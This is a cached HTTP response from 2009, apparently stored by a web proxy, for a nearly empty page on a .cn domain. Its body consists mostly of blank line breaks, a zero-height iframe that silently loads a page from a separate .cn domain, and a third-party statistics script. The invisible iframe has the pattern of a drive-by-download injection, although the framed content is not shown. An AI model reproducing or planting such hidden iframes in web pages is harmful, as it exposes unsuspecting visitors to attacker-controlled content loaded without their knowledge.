HTTP/1.1 200 OK
Content-Length: 240
Date: Wed, 25 Feb 2009 09:12:59 GMT
Last-Modified: Wed, 25 Feb 2009 09:12:05 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.good1685.cn/b3.htm
X-Polipo-Date: Wed, 25 Feb 2009 09:23:46 GMT
X-Polipo-Access: Wed, 25 Feb 2009 09:23:46 GMT

 <br>
<br>
<br>
<iframe src=http://www.sll2468.cn/a8/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystet.js"></script>
<br>
